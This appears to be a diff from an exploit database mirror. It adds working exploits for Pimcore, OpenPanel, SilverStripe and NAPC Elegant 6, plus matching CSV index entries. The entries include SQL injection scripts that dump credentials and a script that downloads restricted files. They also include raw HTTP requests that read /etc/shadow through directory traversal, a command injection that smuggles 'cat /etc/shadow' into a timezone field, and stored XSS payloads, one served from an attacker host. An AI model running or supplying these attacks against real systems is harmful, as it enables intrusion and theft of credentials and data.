print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
|
||||
print("\nDump first five rows of database tables and show SQL errors")
|
||||
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
|
||||
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n")
|
||||
exit(0)
|
||||
|
||||
|
||||
def main(args):
|
||||
|
||||
global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
|
||||
|
||||
if args.ip_address:
|
||||
IP=args.ip_address
|
||||
|
||||
if args.port:
|
||||
PORT=args.port
|
||||
|
||||
if args.get_tables:
|
||||
TABLES=True
|
||||
|
||||
if args.creds:
|
||||
CREDS=True
|
||||
|
||||
if args.max_injects:
|
||||
NUM_INJECTS = int(args.max_injects)
|
||||
|
||||
if args.show_sql_errors:
|
||||
SHOW_SQL_ERROR=True
|
||||
|
||||
if args.examples:
|
||||
usage()
|
||||
|
||||
if vuln_ver_chk():
|
||||
for i in range(0, NUM_INJECTS):
|
||||
breach(i)
|
||||
time.sleep(0.3)
|
||||
|
||||
|
||||
if __name__=='__main__':
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
|
||||
print("NAPC Elegant 6 Asset Library v6.1.655")
|
||||
print("Pre-Authorization SQL Injection 0day Exploit")
|
||||
print("Discovery / eXploit By hyp3rlinx")
|
||||
print("ApparitionSec\n")
|
||||
|
||||
time.sleep(0.5)
|
||||
|
||||
if len(sys.argv)== 1:
|
||||
parser.print_help(sys.stderr)
|
||||
sys.exit(0)
|
||||
|
||||
main(parse_args())
|
42
exploits/multiple/webapps/52193.py
Executable file
42
exploits/multiple/webapps/52193.py
Executable file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
|
||||
# Date: 01/28/2025
|
||||
# Exploit Author: maeitsec
|
||||
# Vendor Homepage: https://pimcore.com/
|
||||
# Software Link: https://github.com/pimcore/pimcore
|
||||
# Version: Pimcore versions prior to 10.5.21
|
||||
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
|
||||
# CVE: CVE-2024-11956
|
||||
|
||||
import requests
|
||||
|
||||
# Replace with target URL and credentials
|
||||
TARGET_URL = "http://example.com/pimcore"
|
||||
USERNAME = "low_privilege_user"
|
||||
PASSWORD = "password123"
|
||||
|
||||
# Authenticate and get session
|
||||
session = requests.Session()
|
||||
login_data = {
|
||||
"username": USERNAME,
|
||||
"password": PASSWORD
|
||||
}
|
||||
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
|
||||
|
||||
if "Login successful" in login_response.text:
|
||||
print("[+] Authenticated successfully.")
|
||||
|
||||
# Exploit the downloadAsZip functionality
|
||||
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
|
||||
payload = {
|
||||
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
|
||||
}
|
||||
download_response = session.post(download_url, data=payload)
|
||||
|
||||
if download_response.status_code == 200:
|
||||
print("[+] Exploit successful. Restricted files downloaded.")
|
||||
with open("restricted_files.zip", "wb") as f:
|
||||
f.write(download_response.content)
|
||||
else:
|
||||
print("[-] Exploit failed. Server returned:", download_response.status_code)
|
||||
else:
|
||||
print("[-] Authentication failed.")
|
30
exploits/multiple/webapps/52194.py
Executable file
30
exploits/multiple/webapps/52194.py
Executable file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search
|
||||
Document
|
||||
# Google Dork: N/A
|
||||
# Date: 1/28/2025
|
||||
# Exploit Author: maeitsec
|
||||
# Vendor Homepage: https://pimcore.com/
|
||||
# Software Link: https://github.com/pimcore/pimcore
|
||||
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
|
||||
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
|
||||
# CVE: CVE-2024-11954
|
||||
|
||||
---
|
||||
|
||||
### Description:
|
||||
A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
|
||||
Object Classification Store functionality. The vulnerability arises due to
|
||||
insufficient input sanitization, allowing an authenticated attacker with
|
||||
access to the classification store to inject malicious JavaScript code.
|
||||
This code is then executed in the context of other users' browsers when
|
||||
they view the affected data.
|
||||
|
||||
### Proof of Concept (PoC):
|
||||
1. Log in to the Pimcore backend as a user with access to the Data Object
|
||||
Classification Store.
|
||||
2. Navigate to the Classification Store and create or edit a key.
|
||||
3. Inject the following payload into the key value:
|
||||
```html
|
||||
<script>alert('XSS')</script>
|
||||
4. Save the file and view it in the frontend or backend. The JavaScript
|
||||
alert will execute, demonstrating the vulnerability.
|
80
exploits/multiple/webapps/52195.txt
Normal file
80
exploits/multiple/webapps/52195.txt
Normal file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal
|
||||
# Date: Dec 05, 2024
|
||||
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
|
||||
# Vendor Homepage: https://openpanel.com/
|
||||
# Software Link: https://openpanel.com/
|
||||
# Version: 0.3.4
|
||||
# Tested on: macOS
|
||||
# CVE : CVE-2024-53537
|
||||
|
||||
### Compress Function ###
|
||||
POST /compress_files HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 96
|
||||
Origin: https://demo.openpanel.org:2083
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Te: trailers
|
||||
|
||||
archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
|
||||
|
||||
### Copy Function ###
|
||||
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
Origin: https://demo.openpanel.org:2083
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Content-Length: 0
|
||||
Te: trailers
|
||||
|
||||
|
||||
### Download Function ###
|
||||
GET /download_file/shadow?path_param=/etc HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
Priority: u=0, i
|
||||
Te: trailers
|
||||
|
||||
|
||||
### View Function ###
|
||||
GET /view_file?filename=shadow&path_param=/etc HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Te: trailers
|
23
exploits/multiple/webapps/52196.txt
Normal file
23
exploits/multiple/webapps/52196.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
|
||||
# Date: Nov 25, 2024
|
||||
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
|
||||
# Vendor Homepage: https://openpanel.com/
|
||||
# Software Link: https://openpanel.com/
|
||||
# Version: 0.3.4
|
||||
# Tested on: macOS
|
||||
# CVE : CVE-2024-53582
|
||||
|
||||
GET /files/../.. HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Te: trailers
|
27
exploits/multiple/webapps/52197.txt
Normal file
27
exploits/multiple/webapps/52197.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
|
||||
# Date: Nov 25, 2024
|
||||
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
|
||||
# Vendor Homepage: https://openpanel.com/
|
||||
# Software Link: https://openpanel.com/
|
||||
# Version: 0.3.4
|
||||
# Tested on: macOS
|
||||
# CVE : CVE-2024-53584
|
||||
|
||||
POST /server/timezone HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/server/timezone
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 51
|
||||
Origin: https://demo.openpanel.org:2083
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Te: trailers
|
||||
|
||||
timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
|
22
exploits/multiple/webapps/52198.txt
Normal file
22
exploits/multiple/webapps/52198.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
|
||||
# Date: Nov 25, 2024
|
||||
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
|
||||
# Vendor Homepage: https://openpanel.com/
|
||||
# Software Link: https://openpanel.com/
|
||||
# Version: 0.3.4
|
||||
# Tested on: macOS
|
||||
# CVE : CVE-2024-53582
|
||||
|
||||
GET /view_file?filename=shadow&path_param=/etc HTTP/2
|
||||
Host: demo.openpanel.org:2083
|
||||
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://demo.openpanel.org:2083/files/
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
Priority: u=0
|
||||
Te: trailers
|
55
exploits/multiple/webapps/52199.txt
Normal file
55
exploits/multiple/webapps/52199.txt
Normal file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
|
||||
# Date: 2025-01-15
|
||||
# Exploit Author: James Nicoll
|
||||
# Vendor Homepage: https://www.silverstripe.org/
|
||||
# Software Link: https://www.silverstripe.org/download/
|
||||
# Category: Web Application
|
||||
# Version: 5.2.22
|
||||
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
|
||||
# CVE : CVE-2024-47605
|
||||
|
||||
## Explanation:
|
||||
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.
|
||||
|
||||
## Requirements
|
||||
1. A Silverstripe CMS website.
|
||||
2. Valid login credentials for a user with page edit rights.
|
||||
3. An attacker server hosting malicious payload.
|
||||
|
||||
## On the attacker server:
|
||||
1. Create an html file with oembded information:
|
||||
```
|
||||
<html>
|
||||
<head>
|
||||
<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
|
||||
</head>
|
||||
<body>
|
||||
<img src="media.jpg">
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
2. Create the json file with XSS payload:
|
||||
```
|
||||
{
|
||||
"title": "Title",
|
||||
"author_name": "author",
|
||||
"type": "video",
|
||||
"height": 113,
|
||||
"width": 200,
|
||||
"version": "1.0",
|
||||
"provider_name": "FakeSite",
|
||||
"thumbnail_height": 360,
|
||||
"thumbnail_width": 480,
|
||||
"thumbnail_url": "http://<attacker_server_ip>/media.jpg",
|
||||
"html":"<script>alert('hello world');</script>"
|
||||
}
|
||||
```
|
||||
3. The media.jpg file can be any image.
|
||||
4. Host these files on a publicly available website
|
||||
|
||||
## On the SilverStripe website:
|
||||
1. Log into the admin portal with a user account that has page editor rights (or higher).
|
||||
2. Select the page you wish to load the malicious content into.
|
||||
3. Within the editor panel, select the "Insert Media via URL" button.
|
||||
4. Enter the IP/Hostname of the attacker server.
|
||||
5. Click Add Media, Insert Media, and then save and publish the page.
|
|
@ -10406,6 +10406,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
|
||||
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,,
|
||||
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
|
||||
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
|
||||
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
|
||||
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
|
||||
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
|
||||
|
@ -10916,6 +10917,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,remote,multiple,,2003-09-10,2012-12-04,1,OSVDB-2531,,,,,https://www.securityfocus.com/bid/8583/info
|
||||
35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",remote,multiple,,2011-05-28,2015-01-17,1,,,,,,https://www.securityfocus.com/bid/48030/info
|
||||
35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",remote,multiple,,2011-05-24,2015-01-15,1,,,,,,https://www.securityfocus.com/bid/47957/info
|
||||
52200,exploits/multiple/remote/52200.txt,"GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50858,,,,,
|
||||
52203,exploits/multiple/remote/52203.txt,"GestioIP 3.5.7 - Cross-Site Scripting (XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50857,,,,,
|
||||
52202,exploits/multiple/remote/52202.txt,"GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50859,,,,,
|
||||
52204,exploits/multiple/remote/52204.txt,"GestioIP 3.5.7 - Remote Command Execution (RCE)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-48760,,,,,
|
||||
52201,exploits/multiple/remote/52201.txt,"GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50861,,,,,
|
||||
41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,remote,multiple,,2017-03-23,2017-03-23,1,CVE-2013-0758;CVE-2013-0757,,,,,https://github.com/rapid7/metasploit-framework/blob/1d617ae3894222cfbbf6951fcd68fd2d1c1b15c6/modules/exploits/multi/http/git_client_command_exec.rb
|
||||
33990,exploits/multiple/remote/33990.rb,"Gitlist - Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80,2014-07-07,2014-07-08,1,CVE-2014-4511;OSVDB-108504;CVE-2013-7392,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-64236-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
|
||||
33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,remote,multiple,,2014-06-30,2014-07-08,1,CVE-2014-5023;OSVDB-108504;OSVDB-108503;CVE-2014-4511;CVE-2013-7392,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-62343-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
|
||||
|
@ -12182,6 +12188,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,,2021-01-27,2021-03-18,1,,,,,,
|
||||
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,,2021-02-11,2021-03-18,1,,,,,,
|
||||
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,,2021-03-15,2021-03-16,0,CVE-2021-27695,,,,,
|
||||
52195,exploits/multiple/webapps/52195.txt,"OpenPanel 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53537,,,,,
|
||||
52196,exploits/multiple/webapps/52196.txt,"OpenPanel 0.3.4 - Incorrect Access Control",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
|
||||
52197,exploits/multiple/webapps/52197.txt,"OpenPanel 0.3.4 - OS Command Injection",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53584,,,,,
|
||||
52198,exploits/multiple/webapps/52198.txt,"OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
|
||||
46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80,2019-01-10,2019-01-10,0,CVE-2019-5893,"SQL Injection (SQLi)",,,http://www.exploit-db.comerp_6.3.1.exe,
|
||||
38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2015-1793;OSVDB-124300,,,,,
|
||||
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,,2021-02-19,2021-02-19,0,,,,,,
|
||||
|
@ -12239,7 +12249,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
|
||||
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
|
||||
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
|
||||
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
|
||||
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
|
||||
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
|
||||
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
|
||||
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
|
||||
34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info
|
||||
|
@ -12309,6 +12321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
|
||||
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
|
||||
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
|
||||
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
|
||||
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
|
||||
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
|
||||
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
|
||||
|
@ -12453,6 +12466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,,,,,,
|
||||
33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,webapps,multiple,,2009-07-16,2017-07-19,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37999/info
|
||||
10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,webapps,multiple,80,2009-11-17,,1,CVE-2009-4086;OSVDB-60657,,,,http://www.exploit-db.comxerver_432.zip,
|
||||
52192,exploits/multiple/webapps/52192.py,"Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection",2025-04-14,hyp3rlinx,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2019-19245,,,,,
|
||||
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
|
||||
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
|
||||
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue